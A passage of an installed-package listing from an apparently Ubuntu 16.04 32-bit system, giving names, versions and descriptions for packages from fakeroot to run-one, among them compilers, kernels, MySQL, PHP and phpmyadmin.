fakeroot 1.20.2-1ubuntu1 tool for simulating superuser privileges
file 1:5.25-2ubuntu1 Determines file type using "magic" numbers
findutils 4.6.0+git+20160126-2 utilities for finding files--find, xargs
fontconfig-config 2.11.94-0ubuntu1 generic font configuration library - configuration
fonts-dejavu-core 2.35-1 Vera font family derivate with additional characters
fonts-ubuntu-font-family-console 1:0.83-0ubuntu2 Ubuntu Font Family Linux console fonts, sans-serif monospace
ftp 0.17-33 classical file transfer client
fuse 2.9.4-1ubuntu3 Filesystem in Userspace
g++ 4:5.3.1-1ubuntu1 GNU C++ compiler
g++-5 5.3.1-14ubuntu2.1 GNU C++ compiler
gawk 1:4.1.3+dfsg-0.1 GNU awk, a pattern scanning and processing language
gcc 4:5.3.1-1ubuntu1 GNU C compiler
gcc-5 5.3.1-14ubuntu2.1 GNU C compiler
gcc-5-base:i386 5.3.1-14ubuntu2.1 GCC, the GNU Compiler Collection (base package)
gcc-6-base:i386 6.0.1-0ubuntu1 GCC, the GNU Compiler Collection (base package)
gettext-base 0.19.7-2ubuntu3 GNU Internationalization utilities for the base system
gir1.2-glib-2.0:i386 1.46.0-3ubuntu1 Introspection data for GLib, GObject, Gio and GModule
git 1:2.7.4-0ubuntu1 fast, scalable, distributed revision control system
git-man 1:2.7.4-0ubuntu1 fast, scalable, distributed revision control system (manual pages)
gnupg 1.4.20-1ubuntu3 GNU privacy guard - a free PGP replacement
gpgv 1.4.20-1ubuntu3 GNU privacy guard - signature verification tool
grep 2.24-1 GNU grep, egrep and fgrep
grub-common 2.02~beta2-36ubuntu3 GRand Unified Bootloader (common files)
grub-gfxpayload-lists 0.7 GRUB gfxpayload blacklist
grub-legacy-ec2 0.7.7~bzr1212-0ubuntu1 Handles update-grub for ec2 instances
grub-pc 2.02~beta2-36ubuntu3 GRand Unified Bootloader, version 2 (PC/BIOS version)
grub-pc-bin 2.02~beta2-36ubuntu3 GRand Unified Bootloader, version 2 (PC/BIOS binaries)
grub2-common 2.02~beta2-36ubuntu3 GRand Unified Bootloader (common files for version 2)
gzip 1.6-4ubuntu1 GNU compression utilities
hostname 3.16ubuntu2 utility to set/show the host name or domain name
ifenslave 2.7ubuntu1 configure network interfaces for parallel routing (bonding)
ifupdown 0.8.10ubuntu1 high level tools to configure network interfaces
inetutils-inetd 2:1.9.4-1build1 internet super server
init 1.29ubuntu1 System-V-like init utilities - metapackage
init-system-helpers 1.29ubuntu1 helper tools for all init systems
initramfs-tools 0.122ubuntu8 generic modular initramfs generator (automation)
initramfs-tools-bin 0.122ubuntu8 binaries used by initramfs-tools
initramfs-tools-core 0.122ubuntu8 generic modular initramfs generator (core tools)
initscripts 2.88dsf-59.3ubuntu2 scripts for initializing and shutting down the system
insserv 1.14.0-5ubuntu3 boot sequence organizer using LSB init.d script dependency information
installation-report 2.60ubuntu1 system installation report
iproute2 4.3.0-1ubuntu3 networking and traffic control tools
iptables 1.6.0-2ubuntu3 administration tools for packet filtering and NAT
iptables-persistent 1.0.4 boot-time loader for netfilter rules, iptables plugin
iputils-ping 3:20121221-5ubuntu2 Tools to test the reachability of network hosts
isc-dhcp-client 4.3.3-5ubuntu12 DHCP client for automatically obtaining an IP address
isc-dhcp-common 4.3.3-5ubuntu12 common files used by all of the isc-dhcp packages
iso-codes 3.65-1 ISO language, territory, currency, script codes and their translations
iw 3.17-1 tool for configuring Linux wireless devices
javascript-common 11 Base support for JavaScript library packages
kbd 1.15.5-1ubuntu4 Linux console font and keytable utilities
keyboard-configuration 1.108ubuntu15 system-wide keyboard preferences
klibc-utils 2.0.4-8ubuntu1 small utilities built with klibc for early boot
kmod 22-1ubuntu4 tools for managing Linux kernel modules
krb5-locales 1.13.2+dfsg-5 Internationalization support for MIT Kerberos
language-pack-en 1:16.04+20160415 translation updates for language English
language-pack-en-base 1:16.04+20160415 translations for language English
laptop-detect 0.13.7ubuntu2 attempt to detect a laptop
less 481-2.1 pager program similar to more
libacl1:i386 2.2.52-3 Access control list shared library
libaio1:i386 0.3.110-2 Linux kernel AIO access library - shared library
libalgorithm-diff-perl 1.19.03-1 module to find differences between files
libalgorithm-diff-xs-perl 0.04-4build1 module to find differences between files (XS accelerated)
libalgorithm-merge-perl 0.08-3 Perl module for three-way merge of textual data
libapache2-mod-php7.0 7.0.4-7ubuntu2.1 server-side, HTML-embedded scripting language (Apache 2 module)
libapparmor-perl 2.10.95-0ubuntu2 AppArmor library Perl bindings
libapparmor1:i386 2.10.95-0ubuntu2 changehat AppArmor library
libapr1:i386 1.5.2-3 Apache Portable Runtime Library
libaprutil1:i386 1.5.4-1build1 Apache Portable Runtime Utility Library
libaprutil1-dbd-sqlite3:i386 1.5.4-1build1 Apache Portable Runtime Utility Library - SQLite3 Driver
libaprutil1-ldap:i386 1.5.4-1build1 Apache Portable Runtime Utility Library - LDAP Driver
libapt-inst2.0:i386 1.2.10ubuntu1 deb package format runtime library
libapt-pkg5.0:i386 1.2.10ubuntu1 package management runtime library
libasan2:i386 5.3.1-14ubuntu2.1 AddressSanitizer -- a fast memory error detector
libasn1-8-heimdal:i386 1.7~git20150920+dfsg-4ubuntu1 Heimdal Kerberos - ASN.1 library
libasprintf0v5:i386 0.19.7-2ubuntu3 GNU library to use fprintf and friends in C++
libatm1:i386 1:2.5.1-1.5 shared library for ATM (Asynchronous Transfer Mode)
libatomic1:i386 5.3.1-14ubuntu2.1 support library providing __atomic built-in functions
libattr1:i386 1:2.4.47-2 Extended attribute shared library
libaudit-common 1:2.4.5-1ubuntu2 Dynamic library for security auditing - common files
libaudit1:i386 1:2.4.5-1ubuntu2 Dynamic library for security auditing
libavahi-client3:i386 0.6.32~rc+dfsg-1ubuntu2 Avahi client library
libavahi-common-data:i386 0.6.32~rc+dfsg-1ubuntu2 Avahi common data files
libavahi-common3:i386 0.6.32~rc+dfsg-1ubuntu2 Avahi common library
libblkid1:i386 2.27.1-6ubuntu3 block device ID library
libbsd0:i386 0.8.2-1 utility functions from BSD systems - shared library
libbz2-1.0:i386 1.0.6-8 high-quality block-sorting file compressor library - runtime
libc-bin 2.23-0ubuntu3 GNU C Library: Binaries
libc-dev-bin 2.23-0ubuntu3 GNU C Library: Development binaries
libc6:i386 2.23-0ubuntu3 GNU C Library: Shared libraries
libc6-dev:i386 2.23-0ubuntu3 GNU C Library: Development Libraries and Header Files
libcap-ng0:i386 0.7.7-1 An alternate POSIX capabilities library
libcap2:i386 1:2.24-12 POSIX 1003.1e capabilities (library)
libcap2-bin 1:2.24-12 POSIX 1003.1e capabilities (utilities)
libcc1-0:i386 5.3.1-14ubuntu2.1 GCC cc1 plugin for GDB
libcgi-fast-perl 1:2.10-1 CGI subclass for work with FCGI
libcgi-pm-perl 4.26-1 module for Common Gateway Interface applications
libcilkrts5:i386 5.3.1-14ubuntu2.1 Intel Cilk Plus language extensions (runtime)
libcomerr2:i386 1.42.13-1ubuntu1 common error description library
libcryptsetup4:i386 2:1.6.6-5ubuntu2 disk encryption support - shared library
libcups2:i386 2.1.3-4 Common UNIX Printing System(tm) - Core library
libcurl3-gnutls:i386 7.47.0-1ubuntu2 easy-to-use client-side URL transfer library (GnuTLS flavour)
libdb5.3:i386 5.3.28-11 Berkeley v5.3 Database Libraries [runtime]
libdbus-1-3:i386 1.10.6-1ubuntu3 simple interprocess messaging system (library)
libdbus-glib-1-2:i386 0.106-1 simple interprocess messaging system (GLib-based shared library)
libdebconfclient0:i386 0.198ubuntu1 Debian Configuration Management System (C-implementation library)
libdevmapper-event1.02.1:i386 2:1.02.110-1ubuntu10 Linux Kernel Device Mapper event support library
libdevmapper1.02.1:i386 2:1.02.110-1ubuntu10 Linux Kernel Device Mapper userspace library
libdns-export162 1:9.10.3.dfsg.P4-8 Exported DNS Shared Library
libdpkg-perl 1.18.4ubuntu1.1 Dpkg perl modules
libdrm2:i386 2.4.67-1 Userspace interface to kernel DRM services -- runtime
libdumbnet1:i386 1.12-7 dumb, portable networking library -- shared library
libedit2:i386 3.1-20150325-1ubuntu2 BSD editline and history libraries
libencode-locale-perl 1.05-1 utility to determine the locale encoding
liberror-perl 0.17-1.2 Perl module for error/exception handling in an OO-ish way
libestr0 0.1.10-1 Helper functions for handling strings (lib)
libevent-2.0-5:i386 2.0.21-stable-2 Asynchronous event notification library
libexpat1:i386 2.1.0-7ubuntu0.16.04.1 XML parsing C library - runtime library
libfakeroot:i386 1.20.2-1ubuntu1 tool for simulating superuser privileges - shared libraries
libfcgi-perl 0.77-1build1 helper module for FastCGI
libfdisk1:i386 2.27.1-6ubuntu3 fdisk partitioning library
libffi6:i386 3.2.1-4 Foreign Function Interface library runtime
libfile-copy-recursive-perl 0.38-1 Perl extension for recursively copying files and directories
libfile-fcntllock-perl 0.22-3 Perl module for file locking with fcntl(2)
libfontconfig1:i386 2.11.94-0ubuntu1 generic font configuration library - runtime
libfreetype6:i386 2.6.1-0.1ubuntu2 FreeType 2 font engine, shared library files
libfribidi0:i386 0.19.7-1 Free Implementation of the Unicode BiDi algorithm
libfuse-dev 2.9.4-1ubuntu3 Filesystem in Userspace (development)
libfuse2:i386 2.9.4-1ubuntu3 Filesystem in Userspace (library)
libgcc-5-dev:i386 5.3.1-14ubuntu2.1 GCC support library (development files)
libgcc1:i386 1:6.0.1-0ubuntu1 GCC support library
libgcrypt20:i386 1.6.5-2 LGPL Crypto library - runtime library
libgd3:i386 2.1.1-4ubuntu0.16.04.1 GD Graphics Library
libgdbm3:i386 1.8.3-13.1 GNU dbm database routines (runtime version)
libgirepository-1.0-1:i386 1.46.0-3ubuntu1 Library for handling GObject introspection data (runtime library)
libglib2.0-0:i386 2.48.0-1ubuntu4 GLib library of C routines
libglib2.0-data 2.48.0-1ubuntu4 Common files for GLib library
libgmp10:i386 2:6.1.0+dfsg-2 Multiprecision arithmetic library
libgnutls-openssl27:i386 3.4.10-4ubuntu1 GNU TLS library - OpenSSL wrapper
libgnutls30:i386 3.4.10-4ubuntu1 GNU TLS library - main runtime library
libgomp1:i386 5.3.1-14ubuntu2.1 GCC OpenMP (GOMP) support library
libgpg-error0:i386 1.21-2ubuntu1 library for common error values and messages in GnuPG components
libgpm2:i386 1.20.4-6.1 General Purpose Mouse - shared library
libgssapi-krb5-2:i386 1.13.2+dfsg-5 MIT Kerberos runtime libraries - krb5 GSS-API Mechanism
libgssapi3-heimdal:i386 1.7~git20150920+dfsg-4ubuntu1 Heimdal Kerberos - GSSAPI support library
libhcrypto4-heimdal:i386 1.7~git20150920+dfsg-4ubuntu1 Heimdal Kerberos - crypto library
libheimbase1-heimdal:i386 1.7~git20150920+dfsg-4ubuntu1 Heimdal Kerberos - Base library
libheimntlm0-heimdal:i386 1.7~git20150920+dfsg-4ubuntu1 Heimdal Kerberos - NTLM support library
libhogweed4:i386 3.2-1 low level cryptographic library (public-key cryptos)
libhtml-parser-perl 3.72-1 collection of modules that parse HTML text documents
libhtml-tagset-perl 3.20-2 Data tables pertaining to HTML
libhtml-template-perl 2.95-2 module for using HTML templates with Perl
libhttp-date-perl 6.02-1 module of date conversion routines
libhttp-message-perl 6.11-1 perl interface to HTTP style messages
libhx509-5-heimdal:i386 1.7~git20150920+dfsg-4ubuntu1 Heimdal Kerberos - X509 support library
libicu55:i386 55.1-7 International Components for Unicode
libidn11:i386 1.32-3ubuntu1 GNU Libidn library, implementation of IETF IDN specifications
libio-html-perl 1.001-1 open an HTML file with automatic charset detection
libisc-export160 1:9.10.3.dfsg.P4-8 Exported ISC Shared Library
libisl15:i386 0.16.1-1 manipulating sets and relations of integer points bounded by linear constraints
libitm1:i386 5.3.1-14ubuntu2.1 GNU Transactional Memory Library
libjbig0:i386 2.1-3.1 JBIGkit libraries
libjpeg-turbo8:i386 1.4.2-0ubuntu3 IJG JPEG compliant runtime library.
libjpeg8:i386 8c-2ubuntu8 Independent JPEG Group's JPEG runtime library (dependency package)
libjs-jquery 1.11.3+dfsg-4 JavaScript library for dynamic web applications
libjs-sphinxdoc 1.3.6-2ubuntu1 JavaScript support for Sphinx documentation
libjs-underscore 1.7.0~dfsg-1ubuntu1 JavaScript's functional programming helper library
libjson-c2:i386 0.11-4ubuntu2 JSON manipulation library - shared library
libk5crypto3:i386 1.13.2+dfsg-5 MIT Kerberos runtime libraries - Crypto Library
libkeyutils1:i386 1.5.9-8ubuntu1 Linux Key Management Utilities (library)
libklibc 2.0.4-8ubuntu1 minimal libc subset for use with initramfs
libkmod2:i386 22-1ubuntu4 libkmod shared library
libkrb5-26-heimdal:i386 1.7~git20150920+dfsg-4ubuntu1 Heimdal Kerberos - libraries
libkrb5-3:i386 1.13.2+dfsg-5 MIT Kerberos runtime libraries
libkrb5support0:i386 1.13.2+dfsg-5 MIT Kerberos runtime libraries - Support library
libldap-2.4-2:i386 2.4.42+dfsg-2ubuntu3 OpenLDAP libraries
libldb1:i386 2:1.1.24-1ubuntu3 LDAP-like embedded database - shared library
liblocale-gettext-perl 1.07-1build1 module using libc functions for internationalization in Perl
liblua5.1-0:i386 5.1.5-8ubuntu1 Shared library for the Lua interpreter version 5.1
liblvm2app2.2:i386 2.02.133-1ubuntu10 LVM2 application library
liblvm2cmd2.02:i386 2.02.133-1ubuntu10 LVM2 command library
liblwp-mediatypes-perl 6.02-1 module to guess media type for a file or a URL
liblxc1 2.0.0-0ubuntu2 Linux Containers userspace tools (library)
liblz4-1:i386 0.0~r131-2ubuntu2 Fast LZ compression algorithm library - runtime
liblzma5:i386 5.1.1alpha+20120614-2ubuntu2 XZ-format compression library
liblzo2-2:i386 2.08-1.2 data compression library
libmagic1:i386 1:5.25-2ubuntu1 File type determination library using "magic" numbers
libmcrypt4 2.5.8-3.3 De-/Encryption Library
libmnl0:i386 1.0.3-5 minimalistic Netlink communication library
libmount1:i386 2.27.1-6ubuntu3 device mounting library
libmpc3:i386 1.0.3-1 multiple precision complex floating-point library
libmpdec2:i386 2.4.2-1 library for decimal floating point arithmetic (runtime library)
libmpfr4:i386 3.1.4-1 multiple precision floating-point computation
libmpx0:i386 5.3.1-14ubuntu2.1 Intel memory protection extensions (runtime)
libmspack0:i386 0.5-1 library for Microsoft compression formats (shared library)
libncurses5:i386 6.0+20160213-1ubuntu1 shared libraries for terminal handling
libncursesw5:i386 6.0+20160213-1ubuntu1 shared libraries for terminal handling (wide character support)
libnetfilter-conntrack3:i386 1.0.5-1 Netfilter netlink-conntrack library
libnettle6:i386 3.2-1 low level cryptographic library (symmetric and one-way cryptos)
libnewt0.52:i386 0.52.18-1ubuntu2 Not Erik's Windowing Toolkit - text mode windowing with slang
libnfnetlink0:i386 1.0.1-3 Netfilter netlink library
libnih1:i386 1.0.3-4.3ubuntu1 NIH Utility Library
libnl-3-200:i386 3.2.27-1 library for dealing with netlink sockets
libnl-genl-3-200:i386 3.2.27-1 library for dealing with netlink sockets - generic netlink
libp11-kit0:i386 0.23.2-3 Library for loading and coordinating access to PKCS#11 modules - runtime
libpam-modules:i386 1.1.8-3.2ubuntu2 Pluggable Authentication Modules for PAM
libpam-modules-bin 1.1.8-3.2ubuntu2 Pluggable Authentication Modules for PAM - helper binaries
libpam-runtime 1.1.8-3.2ubuntu2 Runtime support for the PAM library
libpam-systemd:i386 229-4ubuntu4 system and service manager - PAM module
libpam0g:i386 1.1.8-3.2ubuntu2 Pluggable Authentication Modules library
libpci3:i386 1:3.3.1-1.1ubuntu1 Linux PCI Utilities (shared library)
libpcre16-3:i386 2:8.38-3.1 Perl 5 Compatible Regular Expression Library - 16 bit runtime files
libpcre3:i386 2:8.38-3.1 Perl 5 Compatible Regular Expression Library - runtime files
libpcre3-dev:i386 2:8.38-3.1 Perl 5 Compatible Regular Expression Library - development files
libpcre32-3:i386 2:8.38-3.1 Perl 5 Compatible Regular Expression Library - 32 bit runtime files
libpcrecpp0v5:i386 2:8.38-3.1 Perl 5 Compatible Regular Expression Library - C++ runtime files
libperl5.22:i386 5.22.1-9 shared Perl library
libplymouth4:i386 0.9.2-3ubuntu13 graphical boot animation and logger - shared libraries
libpng12-0:i386 1.2.54-1ubuntu1 PNG library - runtime
libpolkit-agent-1-0:i386 0.105-14.1 PolicyKit Authentication Agent API
libpolkit-backend-1-0:i386 0.105-14.1 PolicyKit backend API
libpolkit-gobject-1-0:i386 0.105-14.1 PolicyKit Authorization API
libpopt0:i386 1.16-10 lib for parsing cmdline parameters
libprocps4:i386 2:3.3.10-4ubuntu2 library for accessing process information from /proc
libpython-stdlib:i386 2.7.11-1 interactive high-level object-oriented language (default python version)
libpython2.7:i386 2.7.11-7ubuntu1 Shared Python runtime library (version 2.7)
libpython2.7-minimal:i386 2.7.11-7ubuntu1 Minimal subset of the Python language (version 2.7)
libpython2.7-stdlib:i386 2.7.11-7ubuntu1 Interactive high-level object-oriented language (standard library, version 2.7)
libpython3-stdlib:i386 3.5.1-3 interactive high-level object-oriented language (default python3 version)
libpython3.5-minimal:i386 3.5.1-10 Minimal subset of the Python language (version 3.5)
libpython3.5-stdlib:i386 3.5.1-10 Interactive high-level object-oriented language (standard library, version 3.5)
libquadmath0:i386 5.3.1-14ubuntu2.1 GCC Quad-Precision Math Library
libreadline5:i386 5.2+dfsg-3build1 GNU readline and history libraries, run-time libraries
libreadline6:i386 6.3-8ubuntu2 GNU readline and history libraries, run-time libraries
libroken18-heimdal:i386 1.7~git20150920+dfsg-4ubuntu1 Heimdal Kerberos - roken support library
librtmp1:i386 2.4+20151223.gitfa8646d-1build1 toolkit for RTMP streams (shared library)
libsasl2-2:i386 2.1.26.dfsg1-14build1 Cyrus SASL - authentication abstraction library
libsasl2-modules:i386 2.1.26.dfsg1-14build1 Cyrus SASL - pluggable authentication modules
libsasl2-modules-db:i386 2.1.26.dfsg1-14build1 Cyrus SASL - pluggable authentication modules (DB)
libseccomp2:i386 2.2.3-3ubuntu3 high level interface to Linux seccomp filter
libselinux1:i386 2.4-3build2 SELinux runtime shared libraries
libselinux1-dev:i386 2.4-3build2 SELinux development headers
libsemanage-common 2.3-1build3 Common files for SELinux policy management libraries
libsemanage1:i386 2.3-1build3 SELinux policy management library
libsepol1:i386 2.4-2 SELinux library for manipulating binary security policies
libsepol1-dev:i386 2.4-2 SELinux binary policy manipulation library and development files
libsigsegv2:i386 2.10-4 Library for handling page faults in a portable way
libslang2:i386 2.3.0-2ubuntu1 S-Lang programming library - runtime version
libsmartcols1:i386 2.27.1-6ubuntu3 smart column output alignment library
libsqlite3-0:i386 3.11.0-1ubuntu1 SQLite 3 shared library
libss2:i386 1.42.13-1ubuntu1 command-line interface parsing library
libssl1.0.0:i386 1.0.2g-1ubuntu4.1 Secure Sockets Layer toolkit - shared libraries
libstdc++-5-dev:i386 5.3.1-14ubuntu2.1 GNU Standard C++ Library v3 (development files)
libstdc++6:i386 5.3.1-14ubuntu2.1 GNU Standard C++ Library v3
libsystemd0:i386 229-4ubuntu4 systemd utility library
libtalloc2:i386 2.1.5-2 hierarchical pool based memory allocator
libtasn1-6:i386 4.7-3ubuntu0.16.04.1 Manage ASN.1 structures (runtime)
libtdb1:i386 1.3.8-2 Trivial Database - shared library
libtevent0:i386 0.9.28-0ubuntu0.16.04.1 talloc-based event loop library - shared library
libtext-charwidth-perl 0.04-7build5 get display widths of characters on the terminal
libtext-iconv-perl 1.7-5build4 converts between character sets in Perl
libtext-wrapi18n-perl 0.06-7.1 internationalized substitute of Text::Wrap
libtiff5:i386 4.0.6-1 Tag Image File Format (TIFF) library
libtimedate-perl 2.3000-2 collection of modules to manipulate date/time information
libtinfo5:i386 6.0+20160213-1ubuntu1 shared low-level terminfo library for terminal handling
libubsan0:i386 5.3.1-14ubuntu2.1 UBSan -- undefined behaviour sanitizer (runtime)
libudev1:i386 229-4ubuntu4 libudev shared library
liburi-perl 1.71-1 module to manipulate and access URI strings
libusb-0.1-4:i386 2:0.1.12-28 userspace USB programming library
libusb-1.0-0:i386 2:1.0.20-1 userspace USB programming library
libustr-1.0-1:i386 1.0.4-5 Micro string library: shared library
libutempter0:i386 1.1.6-3 privileged helper for utmp/wtmp updates (runtime)
libuuid1:i386 2.27.1-6ubuntu3 Universally Unique ID library
libvpx3:i386 1.5.0-2ubuntu1 VP8 and VP9 video codec (shared library)
libwbclient0:i386 2:4.3.9+dfsg-0ubuntu0.16.04.2 Samba winbind client library
libwind0-heimdal:i386 1.7~git20150920+dfsg-4ubuntu1 Heimdal Kerberos - stringprep implementation
libwrap0:i386 7.6.q-25 Wietse Venema's TCP wrappers library
libx11-6:i386 2:1.6.3-1ubuntu2 X11 client-side library
libx11-data 2:1.6.3-1ubuntu2 X11 client-side library
libxau6:i386 1:1.0.8-1 X11 authorisation library
libxcb1:i386 1.11.1-1ubuntu1 X C Binding
libxdmcp6:i386 1:1.1.2-1.1 X11 Display Manager Control Protocol library
libxext6:i386 2:1.3.3-1 X11 miscellaneous extension library
libxml2:i386 2.9.3+dfsg1-1 GNOME XML library
libxmuu1:i386 2:1.1.2-2 X11 miscellaneous micro-utility library
libxpm4:i386 1:3.5.11-1 X11 pixmap library
libxslt1.1:i386 1.1.28-2.1 XSLT 1.0 processing library - runtime library
libxtables11:i386 1.6.0-2ubuntu3 netfilter xtables library
linux-base 4.0ubuntu1 Linux image base package
linux-firmware 1.157 Firmware for Linux kernel drivers
linux-headers-4.4.0-21 4.4.0-21.37 Header files related to Linux kernel version 4.4.0
linux-headers-4.4.0-21-generic 4.4.0-21.37 Linux kernel headers for version 4.4.0 on 32 bit x86 SMP
linux-headers-4.4.0-22 4.4.0-22.40 Header files related to Linux kernel version 4.4.0
linux-headers-4.4.0-22-generic 4.4.0-22.40 Linux kernel headers for version 4.4.0 on 32 bit x86 SMP
linux-headers-generic 4.4.0.22.23 Generic Linux kernel headers
linux-image-4.4.0-21-generic 4.4.0-21.37 Linux kernel image for version 4.4.0 on 32 bit x86 SMP
linux-image-4.4.0-22-generic 4.4.0-22.40 Linux kernel image for version 4.4.0 on 32 bit x86 SMP
linux-image-extra-4.4.0-21-generic 4.4.0-21.37 Linux kernel extra modules for version 4.4.0 on 32 bit x86 SMP
linux-image-extra-4.4.0-22-generic 4.4.0-22.40 Linux kernel extra modules for version 4.4.0 on 32 bit x86 SMP
linux-libc-dev:i386 4.4.0-22.40 Linux Kernel Headers for development
locales 2.23-0ubuntu3 GNU C Library: National Language (locale) data [support]
login 1:4.2-3.1ubuntu5 system login tools
logrotate 3.8.7-2ubuntu2 Log rotation utility
lsb-base 9.20160110 Linux Standard Base init script functionality
lsb-release 9.20160110 Linux Standard Base version reporting utility
lvm2 2.02.133-1ubuntu10 Linux Logical Volume Manager
lxc-common 2.0.0-0ubuntu2 Linux Containers userspace tools (common tools)
lxcfs 2.0.0-0ubuntu2 FUSE based filesystem for LXC
lxd-client 2.0.2-0ubuntu1~16.04.1 Container hypervisor based on LXC - client
make 4.1-6 utility for directing compilation
makedev 2.3.1-93ubuntu1 creates device files in /dev
manpages 4.04-2 Manual pages about using a GNU/Linux system
manpages-dev 4.04-2 Manual pages about using GNU/Linux for development
mawk 1.3.3-17ubuntu2 a pattern scanning and text processing language
mdadm 3.3-2ubuntu7 tool to administer Linux MD arrays (software RAID)
mime-support 3.59ubuntu1 MIME files 'mime.types' & 'mailcap', and support programs
mount 2.27.1-6ubuntu3 tools for mounting and manipulating filesystems
multiarch-support 2.23-0ubuntu3 Transitional package to ensure multiarch compatibility
mysql-client 5.7.12-0ubuntu1 MySQL database client (metapackage depending on the latest version)
mysql-client-5.7 5.7.12-0ubuntu1 MySQL database client binaries
mysql-client-core-5.7 5.7.12-0ubuntu1 MySQL database core client binaries
mysql-common 5.7.12-0ubuntu1 MySQL database common files, e.g. /etc/mysql/my.cnf
mysql-server 5.7.12-0ubuntu1 MySQL database server (metapackage depending on the latest version)
mysql-server-5.7 5.7.12-0ubuntu1 MySQL database server binaries and system database setup
mysql-server-core-5.7 5.7.12-0ubuntu1 MySQL database server binaries
ncurses-base 6.0+20160213-1ubuntu1 basic terminal type definitions
ncurses-bin 6.0+20160213-1ubuntu1 terminal-related programs and man pages
ncurses-term 6.0+20160213-1ubuntu1 additional terminal type definitions
net-tools 1.60-26ubuntu1 NET-3 networking toolkit
netbase 5.3 Basic TCP/IP networking system
netcat-openbsd 1.105-7ubuntu1 TCP/IP swiss army knife
netcat-traditional 1.10-41 TCP/IP swiss army knife
netfilter-persistent 1.0.4 boot-time loader for netfilter configuration
open-iscsi 2.0.873+git0.3b4b4500-14ubuntu3 iSCSI initiator tools
open-vm-tools 2:10.0.7-3227872-2ubuntu1 Open VMware Tools for virtual machines hosted on VMware (CLI)
openssh-client 1:7.2p2-4 secure shell (SSH) client, for secure access to remote machines
openssh-server 1:7.2p2-4 secure shell (SSH) server, for secure access from remote machines
openssh-sftp-server 1:7.2p2-4 secure shell (SSH) sftp server module, for SFTP access from remote machines
openssl 1.0.2g-1ubuntu4.1 Secure Sockets Layer toolkit - cryptographic utility
os-prober 1.70ubuntu3 utility to detect other OSes on a set of drives
overlayroot 0.27ubuntu1 use an overlayfs on top of a read-only root filesystem
passwd 1:4.2-3.1ubuntu5 change and administer password and group data
pastebinit 1.5-1 command-line pastebin client
patch 2.7.5-1 Apply a diff file to an original
pciutils 1:3.3.1-1.1ubuntu1 Linux PCI Utilities
perl 5.22.1-9 Larry Wall's Practical Extraction and Report Language
perl-base 5.22.1-9 minimal Perl system
perl-modules-5.22 5.22.1-9 Core Perl modules
php-common 1:35ubuntu6 Common files for PHP packages
php-gd 1:7.0+35ubuntu6 GD module for PHP [default]
php-gettext 1.0.11-2build1 read gettext MO files directly, without requiring anything other than PHP
php-mbstring 1:7.0+35ubuntu6 MBSTRING module for PHP [default]
php-mysql 1:7.0+35ubuntu6 MySQL module for PHP [default]
php-pear 1:1.10.1+submodules+notgz-6 PEAR Base System
php-phpseclib 2.0.1-1build1 implementations of an arbitrary-precision integer arithmetic library
php-tcpdf 6.0.093+dfsg-1ubuntu1 PHP class for generating PDF files on-the-fly
php-xml 1:7.0+35ubuntu6 DOM, SimpleXML, WDDX, XML, and XSL module for PHP [default]
php7.0 7.0.4-7ubuntu2.1 server-side, HTML-embedded scripting language (metapackage)
php7.0-cli 7.0.4-7ubuntu2.1 command-line interpreter for the PHP scripting language
php7.0-common 7.0.4-7ubuntu2.1 documentation, examples and common module for PHP
php7.0-fpm 7.0.4-7ubuntu2.1 server-side, HTML-embedded scripting language (FPM-CGI binary)
php7.0-gd 7.0.4-7ubuntu2.1 GD module for PHP
php7.0-json 7.0.4-7ubuntu2.1 JSON module for PHP
php7.0-mbstring 7.0.4-7ubuntu2.1 MBSTRING module for PHP
php7.0-mysql 7.0.4-7ubuntu2.1 MySQL module for PHP
php7.0-opcache 7.0.4-7ubuntu2.1 Zend OpCache module for PHP
php7.0-readline 7.0.4-7ubuntu2.1 readline module for PHP
php7.0-xml 7.0.4-7ubuntu2.1 DOM, SimpleXML, WDDX, XML, and XSL module for PHP
phpmyadmin 4:4.5.4.1-2ubuntu1 MySQL web administration tool
pkg-config 0.29.1-0ubuntu1 manage compile and link flags for libraries
plymouth 0.9.2-3ubuntu13 boot animation, logger and I/O multiplexer
plymouth-theme-ubuntu-text 0.9.2-3ubuntu13 boot animation, logger and I/O multiplexer - ubuntu text theme
policykit-1 0.105-14.1 framework for managing administrative policies and privileges
postfix 3.1.0-3 High-performance mail transport agent
procps 2:3.3.10-4ubuntu2 /proc file system utilities
psmisc 22.21-2.1build1 utilities that use the proc file system
python 2.7.11-1 interactive high-level object-oriented language (default version)
python-apt-common 1.1.0~beta1build1 Python interface to libapt-pkg (locales)
python-crypto 2.6.1-6build1 cryptographic algorithms and protocols for Python
python-dnspython 1.12.0-1 DNS toolkit for Python
python-ldb 2:1.1.24-1ubuntu3 Python bindings for LDB
python-minimal 2.7.11-1 minimal subset of the Python language (default version)
python-samba 2:4.3.9+dfsg-0ubuntu0.16.04.2 Python bindings for Samba
python-talloc 2.1.5-2 hierarchical pool based memory allocator - Python bindings
python-tdb 1.3.8-2 Python bindings for TDB
python2.7 2.7.11-7ubuntu1 Interactive high-level object-oriented language (version 2.7)
python2.7-minimal 2.7.11-7ubuntu1 Minimal subset of the Python language (version 2.7)
python3 3.5.1-3 interactive high-level object-oriented language (default python3 version)
python3-apport 2.20.1-0ubuntu2 Python 3 library for Apport crash report handling
python3-apt 1.1.0~beta1build1 Python 3 interface to libapt-pkg
python3-chardet 2.3.0-2 universal character encoding detector for Python3
python3-dbus 1.2.0-3 simple interprocess messaging system (Python 3 interface)
python3-debian 0.1.27ubuntu2 Python 3 modules to work with Debian-related data formats
python3-gi 3.20.0-0ubuntu1 Python 3 bindings for gobject-introspection libraries
python3-minimal 3.5.1-3 minimal subset of the Python language (default python3 version)
python3-newt 0.52.18-1ubuntu2 NEWT module for Python3
python3-pkg-resources 20.7.0-1 Package Discovery and Resource Access using pkg_resources
python3-problem-report 2.20.1-0ubuntu2 Python 3 library to handle problem reports
python3-pycurl 7.43.0-1ubuntu1 Python bindings to libcurl (Python 3)
python3-requests 2.9.1-3 elegant and simple HTTP library for Python3, built for human beings
python3-six 1.10.0-3 Python 2 and 3 compatibility library (Python 3 interface)
python3-software-properties 0.96.20 manage the repositories that you install software from
python3-systemd 231-2build1 Python 3 bindings for systemd
python3-urllib3 1.13.1-2 HTTP library with thread-safe connection pooling for Python3
python3.5 3.5.1-10 Interactive high-level object-oriented language (version 3.5)
python3.5-minimal 3.5.1-10 Minimal subset of the Python language (version 3.5)
readline-common 6.3-8ubuntu2 GNU readline and history libraries, common files
rename 0.20-4 Perl extension for renaming multiple files
resolvconf 1.78ubuntu2 name server information handler
rsync 3.1.1-3ubuntu1 fast, versatile, remote (and local) file-copying tool
rsyslog 8.16.0-1ubuntu3 reliable system and kernel logging daemon
run-one 1.17-0ubuntu1 run just one instance of a command and its args at a time
